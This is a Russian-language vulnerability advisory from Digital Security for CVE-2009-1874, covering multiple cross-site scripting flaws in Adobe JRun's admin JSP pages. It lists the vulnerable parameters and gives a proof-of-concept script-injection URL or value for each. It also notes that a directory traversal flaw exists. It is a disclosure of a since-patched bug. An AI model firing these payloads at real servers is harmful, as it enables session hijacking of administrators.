Услуги
Аудит информационной безопасности

Аудит информационной безопасности компании – многоплановая задача, в
которую входит несколько направлений анализа
ИТ-инфраструктуры и оценки защищенности приложений и устройств

Подробнее
Решения
Решения

Аккумулировав весь опыт Digital Security, мы подготовили отдельные решения по аудиту безопасности. Каждое решение объединяет специализированные услуги для конкретной отрасли бизнеса или сферы исследования. Вы можете выбрать любую из них или несколько — в комплексе

О нас
Digital Security

Практическая информационная безопасность – наша специализация и любимое дело. Уже 18 лет мы помогаем нашим клиентам уберечь сервисы и системы от киберугроз, а также активно участвуем в развитии мирового ИБ-сообщества

Подробнее
Экспертиза
Экспертиза

Для клиентов Digital Security работает команда экспертов ИБ мирового уровня. Мы получаем благодарности за вклад в обеспечение безопасности от лидеров ИТ-индустрии, а также подтверждаем свои навыки международными сертификатами в области ИБ

Подробнее
Ресурсы
Ресурсы

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Подробнее

Мы создаем контент для тех, кому интересна информационная безопасность. Многостраничные технические статьи, бизнес-аналитика с емкими выводами, записи вебинаров и презентации с профильных конференций — все вы найдете в этом разделе

Посмотреть раздел

Масштабные исследования и аналитические обзоры. Описания хакерских инструментов и техник

Статьи и аналитические работы, полезные для бизнеса. Экспертное мнение об актуальных проблемах информационной безопасности

Видеоархив наших вебинаров и конференций. А также анонсы предстоящих мероприятий

Руководства, презентации, чек-листы. Гайды для повышения уровня осведомленности в вопросах ИБ

Наверх

CVE-2009-1874: Множественные уязвимости межсайтового скриптинга в Adobe JRun Application Server.

Вендор

Adobe

Продукт

Adobe JRun Application Server

Тип уязвимости

Множественные уязвимости межсайтового скриптинга

Reported

20.01.2009

Date of Public Advisory

17.08.2009

Подтверждение

Детальное описание

Используя обнаруженные уязвимости, злоумышленник может перехватить cookie администратора и выполнять любые действия в системе от его имени.
Также злоумышленник может прочитать любой файл, используя уязвимость обхода каталога.

1. Уязвимость межсайтового скриптинга обнаружена в скрипте logviewer.jsp
GET parameters «case», «logfile», «num», «readStart», «reverse», «startAt».

Пример
http://[server]/server/[profile]/logging/logviewer.jsp?case=»><script>alert(‘DSecRG XSS’)</script>
http://[server]/server/[profile]/logging/logviewer.jsp?logfile=<IMG SRC=»javascript:alert(‘DSecRG XSS’);»>
http://[server]/server/[profile]/logging/logviewer.jsp?readDir=FALSE&readStart=<script>alert(‘DSecRG XSS’)</script>
http://[server]/server/[profile]/logging/logviewer.jsp?startAt=<script>alert(‘DSecRG XSS’)</script>

 

2. Уязвимость межсайтового скриптинга обнаружена в скрипте redeployear.jsp
Уязвимый GET параметр «redeployEar.url».

Пример
http://[server]/server/[profile]/deployments/redeployear.jsp?redeployEar.url=<script>alert(‘DSecRG XSS’)</script>

 

3. Уязвимость межсайтового скриптинга обнаружена в скрипте undeployear.jsp
Уязвимый GET параметр «deployEar.url».

Пример
http://[server]/server/[profile]/deployments/undeployear.jsp?deployEar.delete=&deployEar.url=<script>alert(‘DSecRG XSS’)</script>

 

4. Уязвимость межсайтового скриптинга обнаружена в скрипте deployear.jsp
Уязвимый GET параметр «form.deploymentFilePath».

Пример
http://[server]/server/[profile]/deployments/deployear.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>

 

5. Уязвимость межсайтового скриптинга обнаружена в скрипте deployejb.jsp
Уязвимый GET параметр «form.deploymentFilePath».

Пример
http://[server]/server/[profile]/deployments/deployejb.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>

 

6. Уязвимость межсайтового скриптинга обнаружена в скрипте deployrar.jsp
Уязвимый GET параметр «form.deploymentFilePath».

Пример
http://[server]/server/[profile]/deployments/deployrar.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>

 

7. Уязвимость межсайтового скриптинга обнаружена в скрипте deploywar.jsp
Уязвимый GET параметр «form.deploymentFilePath».

Пример
http://[server]/server/[profile]/deployments/deploywar.jsp?form.deploymentFilePath=»><script>alert(‘DSecRG XSS’)</script>

 

8. Уязвимость хранимого межсайтового скриптинга обнаружена в скрипте jvmsettings.jsp
Уязвимый GET параметр «vmSettings.javaHome», «vmSettings.vmArgs», «vmSettings.classpaths».

Пример
vmSettings.javaHome=»><script>alert(‘DSecRG XSS’)</script>
vmSettings.vmArgs=</TEXTAREA><script>alert(‘DSecRG XSS’)</script>
vmSettings.classpaths = <script>alert(‘DSecRG XSS’)</script>

 

9. Уязвимость межсайтового скриптинга обнаружена в скрипте overviewwar.jsp
Уязвимый POST параметр «generalSettingsForm.replicationBuddyList», «generalSettingsForm.documentRoot».

Пример
generalSettingsForm.replicationBuddyList = <script>alert(‘DSecRG XSS’)</script>
generalSettingsForm.documentRoot = «><script>alert(‘DSecRG XSS’)</script>

 

Решение
Уязвимость была устранена 17 августа 2009 года.

Мы используем куки. Никогда такого не было, объясните

ОК